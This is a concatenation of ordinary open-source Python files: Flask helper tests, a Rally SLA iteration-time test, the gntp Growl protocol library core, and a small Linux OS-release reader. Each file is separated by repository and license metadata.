datetime.datetime(1973, 3, 11, 6, 30, 45),
datetime.date(1975, 1, 5)
)
app = flask.Flask(__name__)
c = app.test_client()
for i, d in enumerate(test_dates):
url = '/datetest{0}'.format(i)
app.add_url_rule(url, str(i), lambda val=d: flask.jsonify(x=val))
rv = c.get(url)
assert rv.mimetype == 'application/json'
assert flask.json.loads(rv.data)['x'] == http_date(d.timetuple())
def test_post_empty_json_adds_exception_to_response_content_in_debug(self):
app = flask.Flask(__name__)
app.config['DEBUG'] = True
@app.route('/json', methods=['POST'])
def post_json():
flask.request.get_json()
return None
c = app.test_client()
rv = c.post('/json', data=None, content_type='application/json')
assert rv.status_code == 400
assert b'Failed to decode JSON object' in rv.data
def test_post_empty_json_wont_add_exception_to_response_if_no_debug(self):
app = flask.Flask(__name__)
app.config['DEBUG'] = False
@app.route('/json', methods=['POST'])
def post_json():
flask.request.get_json()
return None
c = app.test_client()
rv = c.post('/json', data=None, content_type='application/json')
assert rv.status_code == 400
assert b'Failed to decode JSON object' not in rv.data
def test_json_bad_requests(self):
app = flask.Flask(__name__)
@app.route('/json', methods=['POST'])
def return_json():
return flask.jsonify(foo=text_type(flask.request.get_json()))
c = app.test_client()
rv = c.post('/json', data='malformed', content_type='application/json')
assert rv.status_code == 400
def test_json_custom_mimetypes(self):
app = flask.Flask(__name__)
@app.route('/json', methods=['POST'])
def return_json():
return flask.request.get_json()
c = app.test_client()
rv = c.post('/json', data='"foo"', content_type='application/x+json')
assert rv.data == b'foo'
def test_json_body_encoding(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
return flask.request.get_json()
c = app.test_client()
resp = c.get('/', data=u'"Hällo Wörld"'.encode('iso-8859-15'),
content_type='application/json; charset=iso-8859-15')
assert resp.data == u'Hällo Wörld'.encode('utf-8')
def test_jsonify(self):
d = dict(a=23, b=42, c=[1, 2, 3])
app = flask.Flask(__name__)
@app.route('/kw')
def return_kwargs():
return flask.jsonify(**d)
@app.route('/dict')
def return_dict():
return flask.jsonify(d)
c = app.test_client()
for url in '/kw', '/dict':
rv = c.get(url)
assert rv.mimetype == 'application/json'
assert flask.json.loads(rv.data) == d
def test_json_as_unicode(self):
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = True
with app.app_context():
rv = flask.json.dumps(u'\N{SNOWMAN}')
assert rv == '"\\u2603"'
app.config['JSON_AS_ASCII'] = False
with app.app_context():
rv = flask.json.dumps(u'\N{SNOWMAN}')
assert rv == u'"\u2603"'
def test_json_attr(self):
app = flask.Flask(__name__)
@app.route('/add', methods=['POST'])
def add():
json = flask.request.get_json()
return text_type(json['a'] + json['b'])
c = app.test_client()
rv = c.post('/add', data=flask.json.dumps({'a': 1, 'b': 2}),
content_type='application/json')
assert rv.data == b'3'
def test_template_escaping(self):
app = flask.Flask(__name__)
render = flask.render_template_string
with app.test_request_context():
rv = flask.json.htmlsafe_dumps('</script>')
assert rv == u'"\\u003c/script\\u003e"'
assert type(rv) == text_type
rv = render('{{ "</script>"|tojson }}')
assert rv == '"\\u003c/script\\u003e"'
rv = render('{{ "<\0/script>"|tojson }}')
assert rv == '"\\u003c\\u0000/script\\u003e"'
rv = render('{{ "<!--<script>"|tojson }}')
assert rv == '"\\u003c!--\\u003cscript\\u003e"'
rv = render('{{ "&"|tojson }}')
assert rv == '"\\u0026"'
rv = render('{{ "\'"|tojson }}')
assert rv == '"\\u0027"'
rv = render("<a ng-data='{{ data|tojson }}'></a>",
data={'x': ["foo", "bar", "baz'"]})
assert rv == '<a ng-data=\'{"x": ["foo", "bar", "baz\\u0027"]}\'></a>'
def test_json_customization(self):
class X(object):
def __init__(self, val):
self.val = val
class MyEncoder(flask.json.JSONEncoder):
def default(self, o):
if isinstance(o, X):
return '<%d>' % o.val
return flask.json.JSONEncoder.default(self, o)
class MyDecoder(flask.json.JSONDecoder):
def __init__(self, *args, **kwargs):
kwargs.setdefault('object_hook', self.object_hook)
flask.json.JSONDecoder.__init__(self, *args, **kwargs)
def object_hook(self, obj):
if len(obj) == 1 and '_foo' in obj:
return X(obj['_foo'])
return obj
app = flask.Flask(__name__)
app.testing = True
app.json_encoder = MyEncoder
app.json_decoder = MyDecoder
@app.route('/', methods=['POST'])
def index():
return flask.json.dumps(flask.request.get_json()['x'])
c = app.test_client()
rv = c.post('/', data=flask.json.dumps({
'x': {'_foo': 42}
}), content_type='application/json')
assert rv.data == b'"<42>"'
def test_modified_url_encoding(self):
class ModifiedRequest(flask.Request):
url_charset = 'euc-kr'
app = flask.Flask(__name__)
app.testing = True
app.request_class = ModifiedRequest
app.url_map.charset = 'euc-kr'
@app.route('/')
def index():
return flask.request.args['foo']
rv = app.test_client().get(u'/?foo=정상처리'.encode('euc-kr'))
assert rv.status_code == 200
assert rv.data == u'정상처리'.encode('utf-8')
if not has_encoding('euc-kr'):
test_modified_url_encoding = None
def test_json_key_sorting(self):
app = flask.Flask(__name__)
app.testing = True
assert app.config['JSON_SORT_KEYS'] == True
d = dict.fromkeys(range(20), 'foo')
@app.route('/')
def index():
return flask.jsonify(values=d)
c = app.test_client()
rv = c.get('/')
lines = [x.strip() for x in rv.data.strip().decode('utf-8').splitlines()]
sorted_by_str = [
'{',
'"values": {',
'"0": "foo",',
'"1": "foo",',
'"10": "foo",',
'"11": "foo",',
'"12": "foo",',
'"13": "foo",',
'"14": "foo",',
'"15": "foo",',
'"16": "foo",',
'"17": "foo",',
'"18": "foo",',
'"19": "foo",',
'"2": "foo",',
'"3": "foo",',
'"4": "foo",',
'"5": "foo",',
'"6": "foo",',
'"7": "foo",',
'"8": "foo",',
'"9": "foo"',
'}',
'}'
]
sorted_by_int = [
'{',
'"values": {',
'"0": "foo",',
'"1": "foo",',
'"2": "foo",',
'"3": "foo",',
'"4": "foo",',
'"5": "foo",',
'"6": "foo",',
'"7": "foo",',
'"8": "foo",',
'"9": "foo",',
'"10": "foo",',
'"11": "foo",',
'"12": "foo",',
'"13": "foo",',
'"14": "foo",',
'"15": "foo",',
'"16": "foo",',
'"17": "foo",',
'"18": "foo",',
'"19": "foo"',
'}',
'}'
]
try:
assert lines == sorted_by_int
except AssertionError:
assert lines == sorted_by_str
class TestSendfile(object):
def test_send_file_regular(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.send_file('static/index.html')
assert rv.direct_passthrough
assert rv.mimetype == 'text/html'
with app.open_resource('static/index.html') as f:
rv.direct_passthrough = False
assert rv.data == f.read()
rv.close()
def test_send_file_xsendfile(self):
app = flask.Flask(__name__)
app.use_x_sendfile = True
with app.test_request_context():
rv = flask.send_file('static/index.html')
assert rv.direct_passthrough
assert 'x-sendfile' in rv.headers
assert rv.headers['x-sendfile'] == \
os.path.join(app.root_path, 'static/index.html')
assert rv.mimetype == 'text/html'
rv.close()
def test_send_file_object(self, catch_deprecation_warnings):
app = flask.Flask(__name__)
with catch_deprecation_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'), mode='rb')
rv = flask.send_file(f)
rv.direct_passthrough = False
with app.open_resource('static/index.html') as f:
assert rv.data == f.read()
assert rv.mimetype == 'text/html'
rv.close()
# mimetypes + etag
assert len(captured) == 2
app.use_x_sendfile = True
with catch_deprecation_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f)
assert rv.mimetype == 'text/html'
assert 'x-sendfile' in rv.headers
assert rv.headers['x-sendfile'] == \
os.path.join(app.root_path, 'static/index.html')
rv.close()
# mimetypes + etag
assert len(captured) == 2
app.use_x_sendfile = False
with app.test_request_context():
with catch_deprecation_warnings() as captured:
f = StringIO('Test')
rv = flask.send_file(f)
rv.direct_passthrough = False
assert rv.data == b'Test'
assert rv.mimetype == 'application/octet-stream'
rv.close()
# etags
assert len(captured) == 1
with catch_deprecation_warnings() as captured:
class PyStringIO(object):
def __init__(self, *args, **kwargs):
self._io = StringIO(*args, **kwargs)
def __getattr__(self, name):
return getattr(self._io, name)
f = PyStringIO('Test')
f.name = 'test.txt'
rv = flask.send_file(f)
rv.direct_passthrough = False
assert rv.data == b'Test'
assert rv.mimetype == 'text/plain'
rv.close()
# attachment_filename and etags
assert len(captured) == 3
with catch_deprecation_warnings() as captured:
f = StringIO('Test')
rv = flask.send_file(f, mimetype='text/plain')
rv.direct_passthrough = False
assert rv.data == b'Test'
assert rv.mimetype == 'text/plain'
rv.close()
# etags
assert len(captured) == 1
app.use_x_sendfile = True
with catch_deprecation_warnings() as captured:
with app.test_request_context():
f = StringIO('Test')
rv = flask.send_file(f)
assert 'x-sendfile' not in rv.headers
rv.close()
# etags
assert len(captured) == 1
def test_attachment(self, catch_deprecation_warnings):
app = flask.Flask(__name__)
with catch_deprecation_warnings() as captured:
with app.test_request_context():
f = open(os.path.join(app.root_path, 'static/index.html'))
rv = flask.send_file(f, as_attachment=True)
value, options = parse_options_header(rv.headers['Content-Disposition'])
assert value == 'attachment'
rv.close()
# mimetypes + etag
assert len(captured) == 2
with app.test_request_context():
assert options['filename'] == 'index.html'
rv = flask.send_file('static/index.html', as_attachment=True)
value, options = parse_options_header(rv.headers['Content-Disposition'])
assert value == 'attachment'
assert options['filename'] == 'index.html'
rv.close()
with app.test_request_context():
rv = flask.send_file(StringIO('Test'), as_attachment=True,
attachment_filename='index.txt',
add_etags=False)
assert rv.mimetype == 'text/plain'
value, options = parse_options_header(rv.headers['Content-Disposition'])
assert value == 'attachment'
assert options['filename'] == 'index.txt'
rv.close()
def test_static_file(self):
app = flask.Flask(__name__)
# default cache timeout is 12 hours
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 12 * 60 * 60
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 12 * 60 * 60
rv.close()
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 3600
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 3600
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 3600
rv.close()
class StaticFileApp(flask.Flask):
def get_send_file_max_age(self, filename):
return 10
app = StaticFileApp(__name__)
with app.test_request_context():
# Test with static file handler.
rv = app.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 10
rv.close()
# Test again with direct use of send_file utility.
rv = flask.send_file('static/index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 10
rv.close()
def test_send_from_directory(self):
app = flask.Flask(__name__)
app.testing = True
app.root_path = os.path.join(os.path.dirname(__file__),
'test_apps', 'subdomaintestmodule')
with app.test_request_context():
rv = flask.send_from_directory('static', 'hello.txt')
rv.direct_passthrough = False
assert rv.data.strip() == b'Hello Subdomain'
rv.close()
class TestLogging(object):
def test_logger_cache(self):
app = flask.Flask(__name__)
logger1 = app.logger
assert app.logger is logger1
assert logger1.name == __name__
app.logger_name = __name__ + '/test_logger_cache'
assert app.logger is not logger1
def test_debug_log(self, capsys):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
app.logger.warning('the standard library is dead')
app.logger.debug('this is a debug statement')
return ''
@app.route('/exc')
def exc():
1 // 0
with app.test_client() as c:
c.get('/')
out, err = capsys.readouterr()
assert 'WARNING in test_helpers [' in err
assert os.path.basename(__file__.rsplit('.', 1)[0] + '.py') in err
assert 'the standard library is dead' in err
assert 'this is a debug statement' in err
with pytest.raises(ZeroDivisionError):
c.get('/exc')
def test_debug_log_override(self):
app = flask.Flask(__name__)
app.debug = True
app.logger_name = 'flask_tests/test_debug_log_override'
app.logger.level = 10
assert app.logger.level == 10
def test_exception_logging(self):
out = StringIO()
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
app.logger_name = 'flask_tests/test_exception_logging'
app.logger.addHandler(StreamHandler(out))
@app.route('/')
def index():
1 // 0
rv = app.test_client().get('/')
assert rv.status_code == 500
assert b'Internal Server Error' in rv.data
err = out.getvalue()
assert 'Exception on / [GET]' in err
assert 'Traceback (most recent call last):' in err
assert '1 // 0' in err
assert 'ZeroDivisionError:' in err
def test_processor_exceptions(self):
app = flask.Flask(__name__)
app.config['LOGGER_HANDLER_POLICY'] = 'never'
@app.before_request
def before_request():
if trigger == 'before':
1 // 0
@app.after_request
def after_request(response):
if trigger == 'after':
1 // 0
return response
@app.route('/')
def index():
return 'Foo'
@app.errorhandler(500)
def internal_server_error(e):
return 'Hello Server Error', 500
for trigger in 'before', 'after':
rv = app.test_client().get('/')
assert rv.status_code == 500
assert rv.data == b'Hello Server Error'
def test_url_for_with_anchor(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
assert flask.url_for('index', _anchor='x y') == '/#x%20y'
def test_url_for_with_scheme(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
assert flask.url_for('index', _external=True, _scheme='https') == 'https://localhost/'
def test_url_for_with_scheme_not_external(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return '42'
with app.test_request_context():
pytest.raises(ValueError,
flask.url_for,
'index',
_scheme='https')
def test_url_with_method(self):
from flask.views import MethodView
app = flask.Flask(__name__)
class MyView(MethodView):
def get(self, id=None):
if id is None:
return 'List'
return 'Get %d' % id
def post(self):
return 'Create'
myview = MyView.as_view('myview')
app.add_url_rule('/myview/', methods=['GET'],
view_func=myview)
app.add_url_rule('/myview/<int:id>', methods=['GET'],
view_func=myview)
app.add_url_rule('/myview/create', methods=['POST'],
view_func=myview)
with app.test_request_context():
assert flask.url_for('myview', _method='GET') == '/myview/'
assert flask.url_for('myview', id=42, _method='GET') == '/myview/42'
assert flask.url_for('myview', _method='POST') == '/myview/create'
class TestNoImports(object):
"""Test Flasks are created without import.
Avoiding ``__import__`` helps create Flask instances where there are errors
at import time. Those runtime errors will be apparent to the user soon
enough, but tools which build Flask instances meta-programmatically benefit
from a Flask which does not ``__import__``. Instead of importing to
retrieve file paths or metadata on a module or package, use the pkgutil and
imp modules in the Python standard library.
"""
def test_name_with_import_error(self, modules_tmpdir):
modules_tmpdir.join('importerror.py').write('raise NotImplementedError()')
try:
flask.Flask('importerror')
except NotImplementedError:
assert False, 'Flask(import_name) is importing import_name.'
class TestStreaming(object):
def test_streaming_with_context(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
def generate():
yield 'Hello '
yield flask.request.args['name']
yield '!'
return flask.Response(flask.stream_with_context(generate()))
c = app.test_client()
rv = c.get('/?name=World')
assert rv.data == b'Hello World!'
def test_streaming_with_context_as_decorator(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.stream_with_context
def generate():
yield 'Hello '
yield flask.request.args['name']
yield '!'
return flask.Response(generate())
c = app.test_client()
rv = c.get('/?name=World')
assert rv.data == b'Hello World!'
def test_streaming_with_context_and_custom_close(self):
app = flask.Flask(__name__)
app.testing = True
called = []
class Wrapper(object):
def __init__(self, gen):
self._gen = gen
def __iter__(self):
return self
def close(self):
called.append(42)
def __next__(self):
return next(self._gen)
next = __next__
@app.route('/')
def index():
def generate():
yield 'Hello '
yield flask.request.args['name']
yield '!'
return flask.Response(flask.stream_with_context(
Wrapper(generate())))
c = app.test_client()
rv = c.get('/?name=World')
assert rv.data == b'Hello World!'
assert called == [42]
class TestGetRootPath(object):
def test_static_string_passed(self):
"""
Should just return the current working directory.
"""
reported_path = flask.helpers.get_root_path("testing")
assert os.path.realpath(".") == reported_path
| bsd-3-clause |
vefimova/rally | tests/unit/plugins/common/sla/test_iteration_time.py | 14 | 2035 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import jsonschema
from rally.plugins.common.sla import iteraion_time
from tests.unit import test
class IterationTimeTestCase(test.TestCase):
def test_config_schema(self):
properties = {
"max_seconds_per_iteration": 0
}
self.assertRaises(jsonschema.ValidationError,
iteraion_time.IterationTime.validate, properties)
def test_result(self):
sla1 = iteraion_time.IterationTime(42)
sla2 = iteraion_time.IterationTime(3.62)
for sla in [sla1, sla2]:
sla.add_iteration({"duration": 3.14})
sla.add_iteration({"duration": 6.28})
self.assertTrue(sla1.result()["success"]) # 42 > 6.28
self.assertFalse(sla2.result()["success"]) # 3.62 < 6.28
self.assertEqual("Passed", sla1.status())
self.assertEqual("Failed", sla2.status())
def test_result_no_iterations(self):
sla = iteraion_time.IterationTime(42)
self.assertTrue(sla.result()["success"])
def test_add_iteration(self):
sla = iteraion_time.IterationTime(4.0)
self.assertTrue(sla.add_iteration({"duration": 3.14}))
self.assertTrue(sla.add_iteration({"duration": 2.0}))
self.assertTrue(sla.add_iteration({"duration": 3.99}))
self.assertFalse(sla.add_iteration({"duration": 4.5}))
self.assertFalse(sla.add_iteration({"duration": 3.8}))
| apache-2.0 |
Grogdor/CouchPotatoServer | libs/gntp/core.py | 92 | 13975 | # Copyright: 2013 Paul Traylor
# These sources are released under the terms of the MIT license: see LICENSE
import hashlib
import re
import time
import gntp.shim
import gntp.errors as errors
__all__ = [
'GNTPRegister',
'GNTPNotice',
'GNTPSubscribe',
'GNTPOK',
'GNTPError',
'parse_gntp',
]
#GNTP/<version> <messagetype> <encryptionAlgorithmID>[:<ivValue>][ <keyHashAlgorithmID>:<keyHash>.<salt>]
GNTP_INFO_LINE = re.compile(
'GNTP/(?P<version>\d+\.\d+) (?P<messagetype>REGISTER|NOTIFY|SUBSCRIBE|\-OK|\-ERROR)' +
' (?P<encryptionAlgorithmID>[A-Z0-9]+(:(?P<ivValue>[A-F0-9]+))?) ?' +
'((?P<keyHashAlgorithmID>[A-Z0-9]+):(?P<keyHash>[A-F0-9]+).(?P<salt>[A-F0-9]+))?\r\n',
re.IGNORECASE
)
GNTP_INFO_LINE_SHORT = re.compile(
'GNTP/(?P<version>\d+\.\d+) (?P<messagetype>REGISTER|NOTIFY|SUBSCRIBE|\-OK|\-ERROR)',
re.IGNORECASE
)
GNTP_HEADER = re.compile('([\w-]+):(.+)')
GNTP_EOL = gntp.shim.b('\r\n')
GNTP_SEP = gntp.shim.b(': ')
class _GNTPBuffer(gntp.shim.StringIO):
"""GNTP Buffer class"""
def writeln(self, value=None):
if value:
self.write(gntp.shim.b(value))
self.write(GNTP_EOL)
def writeheader(self, key, value):
if not isinstance(value, str):
value = str(value)
self.write(gntp.shim.b(key))
self.write(GNTP_SEP)
self.write(gntp.shim.b(value))
self.write(GNTP_EOL)
class _GNTPBase(object):
"""Base initilization
:param string messagetype: GNTP Message type
:param string version: GNTP Protocol version
:param string encription: Encryption protocol
"""
def __init__(self, messagetype=None, version='1.0', encryption=None):
self.info = {
'version': version,
'messagetype': messagetype,
'encryptionAlgorithmID': encryption
}
self.hash_algo = {
'MD5': hashlib.md5,
'SHA1': hashlib.sha1,
'SHA256': hashlib.sha256,
'SHA512': hashlib.sha512,
}
self.headers = {}
self.resources = {}
def __str__(self):
return self.encode()
def _parse_info(self, data):
"""Parse the first line of a GNTP message to get security and other info values
:param string data: GNTP Message
:return dict: Parsed GNTP Info line
"""
match = GNTP_INFO_LINE.match(data)
if not match:
raise errors.ParseError('ERROR_PARSING_INFO_LINE')
info = match.groupdict()
if info['encryptionAlgorithmID'] == 'NONE':
info['encryptionAlgorithmID'] = None
return info
def set_password(self, password, encryptAlgo='MD5'):
"""Set a password for a GNTP Message
:param string password: Null to clear password
:param string encryptAlgo: Supports MD5, SHA1, SHA256, SHA512
"""
if not password:
self.info['encryptionAlgorithmID'] = None
self.info['keyHashAlgorithm'] = None
return
self.password = gntp.shim.b(password)
self.encryptAlgo = encryptAlgo.upper()
if not self.encryptAlgo in self.hash_algo:
raise errors.UnsupportedError('INVALID HASH "%s"' % self.encryptAlgo)
hashfunction = self.hash_algo.get(self.encryptAlgo)
password = password.encode('utf8')
seed = time.ctime().encode('utf8')
salt = hashfunction(seed).hexdigest()
saltHash = hashfunction(seed).digest()
keyBasis = password + saltHash
key = hashfunction(keyBasis).digest()
keyHash = hashfunction(key).hexdigest()
self.info['keyHashAlgorithmID'] = self.encryptAlgo
self.info['keyHash'] = keyHash.upper()
self.info['salt'] = salt.upper()
def _decode_hex(self, value):
"""Helper function to decode hex string to `proper` hex string
:param string value: Human readable hex string
:return string: Hex string
"""
result = ''
for i in range(0, len(value), 2):
tmp = int(value[i:i + 2], 16)
result += chr(tmp)
return result
def _decode_binary(self, rawIdentifier, identifier):
rawIdentifier += '\r\n\r\n'
dataLength = int(identifier['Length'])
pointerStart = self.raw.find(rawIdentifier) + len(rawIdentifier)
pointerEnd = pointerStart + dataLength
data = self.raw[pointerStart:pointerEnd]
if not len(data) == dataLength:
raise errors.ParseError('INVALID_DATA_LENGTH Expected: %s Recieved %s' % (dataLength, len(data)))
return data
def _validate_password(self, password):
"""Validate GNTP Message against stored password"""
self.password = password
if password is None:
raise errors.AuthError('Missing password')
keyHash = self.info.get('keyHash', None)
if keyHash is None and self.password is None:
return True
if keyHash is None:
raise errors.AuthError('Invalid keyHash')
if self.password is None:
raise errors.AuthError('Missing password')
keyHashAlgorithmID = self.info.get('keyHashAlgorithmID','MD5')
password = self.password.encode('utf8')
saltHash = self._decode_hex(self.info['salt'])
keyBasis = password + saltHash
self.key = self.hash_algo[keyHashAlgorithmID](keyBasis).digest()
keyHash = self.hash_algo[keyHashAlgorithmID](self.key).hexdigest()
if not keyHash.upper() == self.info['keyHash'].upper():
raise errors.AuthError('Invalid Hash')
return True
def validate(self):
"""Verify required headers"""
for header in self._requiredHeaders:
if not self.headers.get(header, False):
raise errors.ParseError('Missing Notification Header: ' + header)
def _format_info(self):
"""Generate info line for GNTP Message
:return string:
"""
info = 'GNTP/%s %s' % (
self.info.get('version'),
self.info.get('messagetype'),
)
if self.info.get('encryptionAlgorithmID', None):
info += ' %s:%s' % (
self.info.get('encryptionAlgorithmID'),
self.info.get('ivValue'),
)
else:
info += ' NONE'
if self.info.get('keyHashAlgorithmID', None):
info += ' %s:%s.%s' % (
self.info.get('keyHashAlgorithmID'),
self.info.get('keyHash'),
self.info.get('salt')
)
return info
def _parse_dict(self, data):
"""Helper function to parse blocks of GNTP headers into a dictionary
:param string data:
:return dict: Dictionary of parsed GNTP Headers
"""
d = {}
for line in data.split('\r\n'):
match = GNTP_HEADER.match(line)
if not match:
continue
key = match.group(1).strip()
val = match.group(2).strip()
d[key] = val
return d
def add_header(self, key, value):
self.headers[key] = value
def add_resource(self, data):
"""Add binary resource
:param string data: Binary Data
"""
data = gntp.shim.b(data)
identifier = hashlib.md5(data).hexdigest()
self.resources[identifier] = data
return 'x-growl-resource://%s' % identifier
def decode(self, data, password=None):
"""Decode GNTP Message
:param string data:
"""
self.password = password
self.raw = gntp.shim.u(data)
parts = self.raw.split('\r\n\r\n')
self.info = self._parse_info(self.raw)
self.headers = self._parse_dict(parts[0])
def encode(self):
"""Encode a generic GNTP Message
:return string: GNTP Message ready to be sent. Returned as a byte string
"""
buff = _GNTPBuffer()
buff.writeln(self._format_info())
#Headers
for k, v in self.headers.items():
buff.writeheader(k, v)
buff.writeln()
#Resources
for resource, data in self.resources.items():
buff.writeheader('Identifier', resource)
buff.writeheader('Length', len(data))
buff.writeln()
buff.write(data)
buff.writeln()
buff.writeln()
return buff.getvalue()
class GNTPRegister(_GNTPBase):
"""Represents a GNTP Registration Command
:param string data: (Optional) See decode()
:param string password: (Optional) Password to use while encoding/decoding messages
"""
_requiredHeaders = [
'Application-Name',
'Notifications-Count'
]
_requiredNotificationHeaders = ['Notification-Name']
def __init__(self, data=None, password=None):
_GNTPBase.__init__(self, 'REGISTER')
self.notifications = []
if data:
self.decode(data, password)
else:
self.set_password(password)
self.add_header('Application-Name', 'pygntp')
self.add_header('Notifications-Count', 0)
def validate(self):
'''Validate required headers and validate notification headers'''
for header in self._requiredHeaders:
if not self.headers.get(header, False):
raise errors.ParseError('Missing Registration Header: ' + header)
for notice in self.notifications:
for header in self._requiredNotificationHeaders:
if not notice.get(header, False):
raise errors.ParseError('Missing Notification Header: ' + header)
def decode(self, data, password):
"""Decode existing GNTP Registration message
:param string data: Message to decode
"""
self.raw = gntp.shim.u(data)
parts = self.raw.split('\r\n\r\n')
self.info = self._parse_info(self.raw)
self._validate_password(password)
self.headers = self._parse_dict(parts[0])
for i, part in enumerate(parts):
if i == 0:
continue # Skip Header
if part.strip() == '':
continue
notice = self._parse_dict(part)
if notice.get('Notification-Name', False):
self.notifications.append(notice)
elif notice.get('Identifier', False):
notice['Data'] = self._decode_binary(part, notice)
#open('register.png','wblol').write(notice['Data'])
self.resources[notice.get('Identifier')] = notice
def add_notification(self, name, enabled=True):
"""Add new Notification to Registration message
:param string name: Notification Name
:param boolean enabled: Enable this notification by default
"""
notice = {}
notice['Notification-Name'] = name
notice['Notification-Enabled'] = enabled
self.notifications.append(notice)
self.add_header('Notifications-Count', len(self.notifications))
def encode(self):
"""Encode a GNTP Registration Message
:return string: Encoded GNTP Registration message. Returned as a byte string
"""
buff = _GNTPBuffer()
buff.writeln(self._format_info())
#Headers
for k, v in self.headers.items():
buff.writeheader(k, v)
buff.writeln()
#Notifications
if len(self.notifications) > 0:
for notice in self.notifications:
for k, v in notice.items():
buff.writeheader(k, v)
buff.writeln()
#Resources
for resource, data in self.resources.items():
buff.writeheader('Identifier', resource)
buff.writeheader('Length', len(data))
buff.writeln()
buff.write(data)
buff.writeln()
buff.writeln()
return buff.getvalue()
class GNTPNotice(_GNTPBase):
"""Represents a GNTP Notification Command
:param string data: (Optional) See decode()
:param string app: (Optional) Set Application-Name
:param string name: (Optional) Set Notification-Name
:param string title: (Optional) Set Notification Title
:param string password: (Optional) Password to use while encoding/decoding messages
"""
_requiredHeaders = [
'Application-Name',
'Notification-Name',
'Notification-Title'
]
def __init__(self, data=None, app=None, name=None, title=None, password=None):
_GNTPBase.__init__(self, 'NOTIFY')
if data:
self.decode(data, password)
else:
self.set_password(password)
if app:
self.add_header('Application-Name', app)
if name:
self.add_header('Notification-Name', name)
if title:
self.add_header('Notification-Title', title)
def decode(self, data, password):
"""Decode existing GNTP Notification message
:param string data: Message to decode.
"""
self.raw = gntp.shim.u(data)
parts = self.raw.split('\r\n\r\n')
self.info = self._parse_info(self.raw)
self._validate_password(password)
self.headers = self._parse_dict(parts[0])
for i, part in enumerate(parts):
if i == 0:
continue # Skip Header
if part.strip() == '':
continue
notice = self._parse_dict(part)
if notice.get('Identifier', False):
notice['Data'] = self._decode_binary(part, notice)
#open('notice.png','wblol').write(notice['Data'])
self.resources[notice.get('Identifier')] = notice
class GNTPSubscribe(_GNTPBase):
"""Represents a GNTP Subscribe Command
:param string data: (Optional) See decode()
:param string password: (Optional) Password to use while encoding/decoding messages
"""
_requiredHeaders = [
'Subscriber-ID',
'Subscriber-Name',
]
def __init__(self, data=None, password=None):
_GNTPBase.__init__(self, 'SUBSCRIBE')
if data:
self.decode(data, password)
else:
self.set_password(password)
class GNTPOK(_GNTPBase):
"""Represents a GNTP OK Response
:param string data: (Optional) See _GNTPResponse.decode()
:param string action: (Optional) Set type of action the OK Response is for
"""
_requiredHeaders = ['Response-Action']
def __init__(self, data=None, action=None):
_GNTPBase.__init__(self, '-OK')
if data:
self.decode(data)
if action:
self.add_header('Response-Action', action)
class GNTPError(_GNTPBase):
"""Represents a GNTP Error response
:param string data: (Optional) See _GNTPResponse.decode()
:param string errorcode: (Optional) Error code
:param string errordesc: (Optional) Error Description
"""
_requiredHeaders = ['Error-Code', 'Error-Description']
def __init__(self, data=None, errorcode=None, errordesc=None):
_GNTPBase.__init__(self, '-ERROR')
if data:
self.decode(data)
if errorcode:
self.add_header('Error-Code', errorcode)
self.add_header('Error-Description', errordesc)
def error(self):
return (self.headers.get('Error-Code', None),
self.headers.get('Error-Description', None))
def parse_gntp(data, password=None):
"""Attempt to parse a message as a GNTP message
:param string data: Message to be parsed
:param string password: Optional password to be used to verify the message
"""
data = gntp.shim.u(data)
match = GNTP_INFO_LINE_SHORT.match(data)
if not match:
raise errors.ParseError('INVALID_GNTP_INFO')
info = match.groupdict()
if info['messagetype'] == 'REGISTER':
return GNTPRegister(data, password=password)
elif info['messagetype'] == 'NOTIFY':
return GNTPNotice(data, password=password)
elif info['messagetype'] == 'SUBSCRIBE':
return GNTPSubscribe(data, password=password)
elif info['messagetype'] == '-OK':
return GNTPOK(data)
elif info['messagetype'] == '-ERROR':
return GNTPError(data)
raise errors.ParseError('INVALID_GNTP_MESSAGE')
| gpl-3.0 |
hackshel/metaCollecter | src/meta/modules/mod_linux_osinfo.py | 1 | 1138 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import re
class State( object ):
def __init__( self ,args=None ):
if not args:
pass #添加默认参数信息
else:
self.args = list(args)
self.rel = '/etc/redhat-release'
self.verRe = re.compile("^(\d+(\.\d+)?)")
def getRelease( self ):
fp = open( self.rel )
c = fp.readlines()
if c[0] != '':
line = c[0].split()
fp.close()
r = []
r.append(line[0].strip())
for x in line:
version = self.verRe.search( x )
if version :
r.append(version.groups()[0])
break
return r
def get( self ):
res = {}
release = self.getRelease()
res['os_type'] = self.args[0]
res['os_kernel'] = self.args[2]
res['os_platform'] = self.args[4]
res['os_release'] = release[0]
